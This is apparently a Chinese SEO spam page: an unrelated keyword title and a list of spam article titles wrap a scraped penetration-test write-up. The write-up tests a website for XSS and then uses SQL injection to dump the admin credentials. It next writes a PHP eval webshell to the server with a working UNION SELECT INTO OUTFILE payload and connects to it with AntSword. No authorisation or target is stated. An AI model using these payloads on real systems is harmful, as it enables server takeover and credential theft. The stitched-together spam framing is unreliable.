当前位置: 首页 > news >正文

wordpress全站开启ssl网站开发是做什么的

wordpress全站开启ssl,网站开发是做什么的,网站蜘蛛抓取,wordpress 文章主题图1.xss漏洞 搜索框输入以下代码&#xff0c;验证是否存在xss漏洞 <script>alert(1)</script> OK了&#xff0c;存在xss漏洞 2.SQL注入 经过测试&#xff0c;输入框存在SQL注入漏洞 查询数据库名 查询管理员账号密码 此处密码为MD5加密&#xff0c;解码内容如下 找…

1.xss漏洞

搜索框输入以下代码,验证是否存在xss漏洞

<script>alert(1)</script>

OK了,存在xss漏洞

2.SQL注入

经过测试,输入框存在SQL注入漏洞

查询数据库名

查询管理员账号密码

 此处密码为MD5加密,解码内容如下

找了半天,没有找到管理员登录界面,所以找到管理员账号和密码没有用,虽然没有,但是证明了一点,那就是此处可以无限制输入命令,并执行,通过扫描目录发现存在phpinfo文件,访问得知网站绝对路径

于是乎,尝试使用sql注入的方式,上传一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/www.php' #

根据设定的地址访问上传的文件 

写入成功,蚁剑连接大脑,cmd代替思考

完事🧐

http://www.tj-hxxt.cn/news/29124.html

相关文章:

  • 安卓端网站开发ide网页开发
  • 虚拟空间怎么做网站目录指向百度关键词搜索量排行
  • 网站制作小工具seo算法培训
  • 个人网站的设计与实现sem是什么岗位
  • 网站增加点击率 怎样做网络营销推广活动有哪些
  • 企业网站案例展示除了百度指数还有哪些指数
  • 在线营销型网站seo公司 彼亿营销
  • 软件资源网站推荐重庆放心seo整站优化
  • 淮北做网站的公司有哪些免费入驻的电商平台
  • 做网站的软件叫code石家庄新闻
  • 单位建设网站需要的材料sem代运营费用
  • 有网站可以接设计的单子做吗青岛seo招聘
  • 怎么用net123做网站做了5天游戏推广被抓了
  • 如何做流量网站培训班有哪些
  • 深圳哪里有做网站的百度推广收费标准
  • 网站建设招标方案模板网站是怎么建立起来的
  • 怎么下载网站动态图片阿里云搜索
  • 如何找网站开发人员seo是什么牌子
  • 品划做网站要怎么网络做推广
  • 手机做网站的软件wordpress建站
  • 老年公寓网站模板全网整合营销外包
  • 手机网站建设哪个好seo排名优化推广
  • 东莞公司官网建站网络营销推广方案步骤
  • 国际新闻消息免费的seo优化
  • 那些网站是做生鲜的营销策划公司排名
  • 58同城本地网页版百度sem优化师
  • 建设工程消防信息网站适合交换友情链接的是
  • 怎么问客户做不做网站卢松松外链工具
  • 网站后台改成只有一个管理员登陆企业网站推广的一般策略
  • 网站建设与管理实践收获怎么写荆门网站seo